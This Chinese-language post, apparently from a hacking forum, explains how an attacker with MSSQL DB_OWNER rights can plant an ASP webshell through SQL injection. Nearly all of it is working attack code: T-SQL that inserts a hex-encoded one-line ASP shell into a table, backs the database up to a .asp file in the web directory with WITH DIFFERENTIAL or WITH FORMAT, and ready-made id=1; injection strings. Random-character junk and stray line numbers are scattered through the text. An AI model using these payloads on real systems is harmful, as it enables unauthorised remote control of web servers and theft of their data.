DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

% p; l- r7 W; O" U. d减少备份文件大小，得到可执行的webshell成功率提高不少
9 C+ D* U% |5 n( ]/ Z5 d- X+ O一利用差异备份
+ g" B6 }( L0 d0 f  v4 M加一个参数WITH DIFFERENTIAL

1
2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
5 c0 ~0 A' w. L. ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
* s* p* W, g2 T0 k5 _
2 y0 D# u! E  j% v  r二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

" G3 y% U8 J% f0 }1 l  X& S; P- R" ]1
) r$ j, W& P* F5 ]: j7 k2
3
, Y; \( ~& c, `. N4 d" A9 l4
) v" G/ t4 E5 l* q declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
# S+ @+ U( D) n! v. |' @: Binsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* `" l: ?/ P2 @! [" Fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
2 O) h- ^5 q( E: D; F( _1
3 M- C3 {0 ~/ O( w, |: G$ P) W
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
' y. |- C2 R9 \
2
: m5 g6 u: W8 @( c9 J
& P2 z. [3 v2 Q# j1 X  V- m# z6 p) h: l1
id=1;backup database model to disk='你的路径‘ with differential,format;--
/ G4 \- Z' ^, e/ Q; d